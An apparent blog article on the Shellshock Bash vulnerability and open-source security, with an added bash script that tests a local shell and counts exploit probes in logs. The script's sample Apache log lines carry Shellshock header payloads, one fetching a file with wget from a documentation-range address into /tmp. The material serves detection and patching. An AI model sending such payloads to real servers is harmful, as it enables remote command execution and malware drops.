Earlier this year, the discovery of the Heartbleed vulnerability caused a tremendous amount of discussion and worry around open source security. While some argued that this incident revealed that open source is not as reliable as originally thought, most experts believed that Heartbleed was essentially an anomaly, one that would drive companies and IT personnel to improve their security efforts.
However, now another open source vulnerability has appeared, one that is quite possibly even more dangerous than Heartbleed. This bug, known as Shellshock, is a serious flaw that could cause major problems. As was the case with Heartbleed, this discovery should serve as motivation for companies relying on open source to shore up their security efforts.
As Harvard Business Review contributor Karim Lakhani explained, Shellshock is a vulnerability in Bash, the command shell installed by default on most Linux and Unix systems. Bash passes function definitions to child shells through environment variables, and a vulnerable version keeps executing whatever text follows such a definition. An attacker who can set any environment variable that reaches Bash, for example through a web server's CGI interface, can therefore run commands of their choosing and potentially take control of the system.
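The following script is an added example and is not code from the original article or from the Bash project. It shows the legitimate function-export feature the bug lives in, the classic local probe for the original Shellshock bug (CVE-2014-6271), and a simple sweep of web server logs for exploitation attempts. The Apache access-log lines are constructed for the example, and the `greet` function and the `SAMPLE_LOG` variable are names chosen here; everything else is standard bash and grep.

```shell
#!/usr/bin/env bash
# Added example (not from the original article). Three small checks around
# the Shellshock bug (CVE-2014-6271):
#   1. exported_function_demo: the legitimate bash feature the bug lives in,
#   2. shellshock_check: the classic probe for whether the local bash still
#      runs commands appended to an exported function definition,
#   3. count_shellshock_probes: a log sweep for exploitation attempts, run
#      here over constructed Apache access-log lines.

# 1. Bash serialises an exported function as an environment variable whose
#    value begins with "() {", and a child bash re-parses it at startup.
#    Prints "greetings" when bash is installed, "no-bash" otherwise.
exported_function_demo() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }
    bash -c 'greet() { echo greetings; }; export -f greet; bash -c greet'
}

# 2. Vulnerable versions kept parsing past the closing brace and executed
#    whatever followed, so any attacker-controlled environment variable that
#    reached bash (HTTP headers exported by CGI, SSH_ORIGINAL_COMMAND under
#    ForceCommand, DHCP options) became command execution. The function body
#    below is a no-op; the trailing "echo vulnerable" must never run on a
#    patched bash. Prints "vulnerable", "patched" or "no-bash".
shellshock_check() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }
    out="$(env 'x=() { :;}; echo vulnerable' bash -c 'echo probe' 2>/dev/null)"
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# 3. Exploit attempts place the "() {" marker in any request header that a
#    CGI script might export (User-Agent, Referer, Cookie). These are
#    constructed sample lines, not real traffic: the first and third carry a
#    payload, the second is an ordinary request.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://203.0.113.9/x -O /tmp/x\""
198.51.100.7 - - [25/Sep/2014:10:01:03 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :; }; ping -c 1 203.0.113.9" "-"'

# Counts log lines containing the function-definition marker. Reads the file
# given as $1, or the sample above when no file is given. The literal "() {"
# is a strong indicator: it has no business appearing in an HTTP header.
count_shellshock_probes() {
    if [ -n "${1:-}" ]; then
        grep -c -F '() {' "$1"
    else
        printf '%s\n' "$SAMPLE_LOG" | grep -c -F '() {'
    fi
}

# Stand-alone run: report on the local bash and on the sample log.
echo "function export: $(exported_function_demo)"
echo "local bash:      $(shellshock_check)"
echo "probe lines:     $(count_shellshock_probes)"
```

Run `shellshock_check` on every host after patching, not just on the one where the update was tested; a result of "patched" means the original bug is closed, but the same parser had follow-up bugs, so the real fix is a current Bash package rather than only the first patch. Point `count_shellshock_probes` at the real access log (`count_shellshock_probes /var/log/apache2/access.log`) to find who probed the server, and treat hits on CGI paths as a reason to check those hosts for dropped files and unexpected outbound connections, since the probe is usually followed by a download or a callback.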
Shellshock has major implications for the Internet of Things, according to Lakhani. A huge number of embedded and network-connected devices run Linux or Unix with Bash on board, and many of them are rarely or never updated, so they may remain exposed to criminals exploiting this flaw long after servers have been patched. This, the writer explained, makes Shellshock a much more significant threat to companies' security than Heartbleed ever was: Heartbleed leaked data, while Shellshock lets an attacker run commands and so threatens actual operations.
Fortunately, as Lakhani noted, affected organizations, including the open source communities that maintain Bash and the major Linux distributions, quickly began work on patches and other countermeasures. Some of these are already available, and applying them is the first step any affected organization should take.
However, this is only a short-term solution, and it does not address the greater issue. According to Lakhani, Shellshock will not be the last major vulnerability to appear, and firms need to take steps to prepare for more discoveries of this sort.
Infoworld contributor Roger Grimes seconded this notion. Grimes argued that this latest vulnerability should be seen as evidence that simply having more eyes viewing open source code does not automatically ensure its security. Put simply, he explained that while open source presents the opportunity for many people and organizations to view and evaluate a given piece of code’s security, the fact of the matter is that most will not take this step. And if that’s the case, then the potential inherent security advantages of open source will remain theoretical.
All of this does not mean that companies should abandon open source. Instead, businesses need to realize that it is dangerous to rely on others to verify the security of these solutions. This mindset has led many companies to embrace open source without taking the appropriate defensive measures, thereby putting their assets at risk.
Instead, organizations should invest in high-quality open source security tools that can protect these resources. Specifically, open source scanning tools can reveal precisely which open source components, and which versions of them, are in use throughout the organization. This inventory is what makes it possible to find and patch every affected system quickly when a vulnerability like Shellshock is announced, and it is key to ensuring that the company is following best practices with its open source adoption, limiting the risk of exposure or data loss.